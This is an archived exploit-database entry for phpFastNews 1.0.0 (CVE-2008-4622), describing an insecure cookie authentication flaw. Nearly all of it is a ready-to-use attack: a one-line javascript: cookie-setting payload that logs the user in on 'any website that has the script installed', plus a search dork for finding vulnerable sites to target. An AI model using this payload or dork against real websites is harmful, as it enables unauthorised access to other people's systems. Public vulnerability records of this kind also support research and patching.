phpFastNews 1.0.0 - Insecure Cookie Handling

Author: Qabandi
type: webapps
platform: php
port: 
date_added: 2008-10-17 
date_updated:  
verified: 1 
codes: OSVDB-49175;CVE-2008-4622 
tags: 
aliases:  
screenshot_url:  
application_url: 

#################################################
##	Qabandi 	iqa[at]hotmail.fr      ##
##		from Kuwait		       ##
#################################################
\\	phpFastNews
//	 Insecure cookie handling
\\
//   Go to any website that has the script installed
\\	type the following code into the Adress Bar
//
\\	javascript:document.cookie = "fn-loggedin = 1";
//
\\	Refresh do whatever, and you will be logged in
//
\\		Dork:intext:"Powered by phpFastNews"
#################################################
##	Greetz: Killer Hack, Str0ke	       ##
#################################################
		PEACE

# milw0rm.com [2008-10-18]